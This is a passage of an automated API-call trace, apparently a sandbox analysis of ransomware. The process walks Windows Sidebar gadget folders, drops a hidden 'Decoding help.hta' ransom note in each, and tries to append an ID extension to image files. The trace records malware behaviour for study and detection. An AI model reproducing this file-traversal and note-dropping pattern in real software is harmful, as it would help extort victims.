lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.078] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.078] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images" [0058.078] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Images\\*.*" [0058.078] GlobalMemoryStatus (in: lpBuffer=0x1d71fd10 | out: lpBuffer=0x1d71fd10) [0058.078] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x10d5eb58, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x384 [0058.079] CloseHandle (hObject=0x384) returned 1 [0058.079] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b8fe39, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85b8fe39, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3bdf1625, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.079] lstrcpyW (in: lpString1=0x108e05f8, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" [0058.079] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\decoding help.hta")) returned 0x1 [0058.079] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.079] lstrlenW (lpString="logo.png") returned 8 [0058.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*" [0058.079] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\*.*") returned 69 [0058.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" [0058.079] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" [0058.079] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.079] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\PicturePuzzle.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\picturepuzzle.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.080] FindNextFileW (in: hFindFile=0x5d8ad0, lpFindFileData=0x1d71fd30 | out: lpFindFileData=0x1d71fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85b8fe39, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85b8fe39, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3bdf1625, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.080] FindClose (in: hFindFile=0x5d8ad0 | out: hFindFile=0x5d8ad0) returned 1 Thread: id = 449 os_tid = 0x8ec [0044.903] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*", lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5d8990 [0049.247] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0049.247] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0049.247] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0049.247] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c4e50a, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85c4e50a, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3cdb6711, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x2141, dwReserved0=0x0, dwReserved1=0x0, cFileName="drag.png", cAlternateFileName="")) returned 1 [0049.651] lstrcpyW (in: lpString1=0x108e8600, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0049.651] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0049.651] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0049.652] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0xffffffff [0049.652] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c8 [0051.179] WriteFile (in: hFile=0x4c8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x1d85fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x1d85fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0054.009] CloseHandle (hObject=0x4c8) returned 1 [0055.312] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0058.133] lstrcmpiW (lpString1="Decoding help.hta", lpString2="drag.png") returned -1 [0058.133] lstrlenW (lpString="drag.png") returned 8 [0058.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" [0058.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" [0058.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.133] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\drag.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\drag.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.133] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1eb25fda, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x22e64bc5, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0058.133] lstrcmpW (lpString1=".", lpString2="en-US") returned -1 [0058.133] lstrcmpW (lpString1="..", lpString2="en-US") returned -1 [0058.133] lstrcmpiW (lpString1="windows", lpString2="en-US") returned 1 [0058.133] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.133] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.133] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="en-US" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US" [0058.134] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\en-US\\*.*" [0058.134] GlobalMemoryStatus (in: lpBuffer=0x1d85fd10 | out: lpBuffer=0x1d85fd10) [0058.134] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x112ec1d0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a4 [0058.134] CloseHandle (hObject=0x3a4) returned 1 [0058.134] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3ce029cd, ftCreationTime.dwHighDateTime=0x1c9ea0e, ftLastAccessTime.dwLowDateTime=0x3ce029cd, ftLastAccessTime.dwHighDateTime=0x1c9ea0e, ftLastWriteTime.dwLowDateTime=0x3ce029cd, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1d07, dwReserved0=0x0, dwReserved1=0x0, cFileName="icon.png", cAlternateFileName="")) returned 1 [0058.135] lstrcpyW (in: lpString1=0x2518fa70, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0058.135] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0x1 [0058.135] lstrcmpiW (lpString1="Decoding help.hta", lpString2="icon.png") returned -1 [0058.135] lstrlenW (lpString="icon.png") returned 8 [0058.135] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.135] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" [0058.135] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" [0058.135] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.135] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\icon.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\icon.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.136] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8061433b, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x8061433b, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="images", cAlternateFileName="")) returned 1 [0058.136] lstrcmpW (lpString1=".", lpString2="images") returned -1 [0058.136] lstrcmpW (lpString1="..", lpString2="images") returned -1 [0058.136] lstrcmpiW (lpString1="windows", lpString2="images") returned 1 [0058.141] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.141] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="images" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images" [0058.141] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\images\\*.*" [0058.141] GlobalMemoryStatus (in: lpBuffer=0x1d85fd10 | out: lpBuffer=0x1d85fd10) [0058.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x2ab69190, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x3a4 [0058.142] CloseHandle (hObject=0x3a4) returned 1 [0058.142] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c283ad, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85c283ad, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3cff1b93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 1 [0058.142] lstrcpyW (in: lpString1=0x2518fa70, lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.142] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" [0058.142] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\Decoding help.hta" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\decoding help.hta")) returned 0x1 [0058.142] lstrcmpiW (lpString1="Decoding help.hta", lpString2="logo.png") returned -1 [0058.142] lstrlenW (lpString="logo.png") returned 8 [0058.142] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*" [0058.142] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\*.*") returned 64 [0058.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\", lpString2="logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" [0058.142] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" [0058.142] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" [0058.142] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png"), lpNewFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\RSSFeeds.Gadget\\logo.png.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\windows sidebar\\gadgets\\rssfeeds.gadget\\logo.png.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0058.143] FindNextFileW (in: hFindFile=0x5d8990, lpFindFileData=0x1d85fd30 | out: lpFindFileData=0x1d85fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x85c283ad, ftCreationTime.dwHighDateTime=0x1ca0403, ftLastAccessTime.dwLowDateTime=0x85c283ad, ftLastAccessTime.dwHighDateTime=0x1ca0403, ftLastWriteTime.dwLowDateTime=0x3cff1b93, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0x1816, dwReserved0=0x0, dwReserved1=0x0, cFileName="logo.png", cAlternateFileName="")) returned 0 [0058.143] FindClose (in: hFindFile=0x5d8990 | out: hFindFile=0x5d8990) returned 1 Thread: id = 450 os_tid = 0x8b4 [0044.923] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Windows Sidebar\\Gadgets\\SlideShow.Gadget\\*.*", lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e2870 [0047.622] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0047.622] FindNextFileW (in: hFindFile=0x5e2870, lpFindFileData=0x1d99fd30 | out: lpFindFileData=0x1d99fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80046d91, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1eaffd21, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eaffd21, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 